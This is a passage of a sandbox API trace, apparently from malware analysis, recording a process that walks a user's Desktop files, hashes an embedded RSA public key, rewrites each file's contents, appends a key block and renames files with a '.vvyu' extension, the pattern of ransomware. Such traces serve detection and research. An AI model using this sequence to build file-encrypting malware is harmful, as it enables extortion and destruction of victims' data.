[0192.636] CloseHandle (hObject=0x568) returned 1 [0192.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0192.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2e9ea68 [0192.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0192.638] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\L-TI2NVRPaCP-tk9F.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\l-ti2nvrpacp-tk9f.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\L-TI2NVRPaCP-tk9F.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\l-ti2nvrpacp-tk9f.mkv.vvyu")) returned 1 [0192.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.639] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0192.649] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ab0460, ftCreationTime.dwHighDateTime=0x1d8a1e1, ftLastAccessTime.dwLowDateTime=0x44576b00, ftLastAccessTime.dwHighDateTime=0x1d8a33a, ftLastWriteTime.dwLowDateTime=0x44576b00, ftLastWriteTime.dwHighDateTime=0x1d8a33a, nFileSizeHigh=0x0, nFileSizeLow=0x17fef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ldMOZunCS-h9r3 XU2.mp4", cAlternateFileName="LDMOZU~1.MP4")) returned 1 [0192.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95380 [0192.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0192.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95380 | out: hHeap=0x620000) returned 1 [0192.650] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ldMOZunCS-h9r3 XU2.mp4") returned=".mp4" [0192.650] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ldMOZunCS-h9r3 XU2.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\ldmozuncs-h9r3 xu2.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.650] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=98287) returned 1 [0192.650] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.653] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x17fc9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.653] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.655] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.655] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x17fef, lpOverlapped=0x0) returned 1 [0192.657] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.657] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.657] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.657] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.658] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.658] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.658] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.658] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.658] GetLastError () returned 0x0 [0192.658] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.658] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.659] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.659] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.659] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17ff0) returned 0x2ea79b0 [0192.659] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95380 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e953c8 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.660] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9ea68 [0192.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0192.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93678 [0192.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93660 [0192.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0192.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0192.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.663] GetCurrentThreadId () returned 0x66c [0192.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e6e0 [0192.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.664] GetCurrentThreadId () returned 0x66c [0192.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93678 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936d8 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936f0 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93690 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93660 [0192.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9ea68 [0192.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0192.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9ec78 [0192.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0192.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ee90 [0192.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ec78 | out: hHeap=0x620000) returned 1 [0192.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee90 | out: hHeap=0x620000) returned 1 [0192.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e953c8 | out: hHeap=0x620000) returned 1 [0192.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.674] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x17fea, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x17fea, lpOverlapped=0x0) returned 1 [0192.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.676] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x17fef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.676] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 